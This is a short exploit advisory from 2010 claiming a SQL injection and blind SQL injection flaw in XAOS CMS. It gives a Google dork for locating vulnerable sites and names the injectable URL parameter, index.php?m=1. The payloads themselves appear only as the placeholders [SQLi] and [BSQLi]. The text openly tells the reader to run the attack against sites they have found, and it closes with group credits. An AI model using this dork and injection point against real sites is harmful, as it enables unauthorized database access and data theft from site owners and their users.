# Exploit Title: XAOS CMS SQL Injection Vulnerability# Date: 25/07/2010 # Author: H-SK33PY# Software Link: http://www.xaos.it/# Version: N/A# Google dork : Powered by XAOS systems# Platform / Tested on: linux# Category: webapplications# Code : [SQLi] & [BSQLi]01010101010101010101010101010101010101010101010101010101000
1Iranian Datacoders Security Team 201000010101010101010101010101010101010101010101010101010101010#BUG:#########################################################################
After find bug on the sites , run this :
http://site.com/index.php?m=1[SQLi]
If you can not inject run Blind SQL Injection
http://site.com/index.php?m=1[BSQLi]#############################################################################
Website : http://www.datacoders.ir
Special Thanks to : ccC0d3rZzz &all iranian datacoders members
#############################################################################
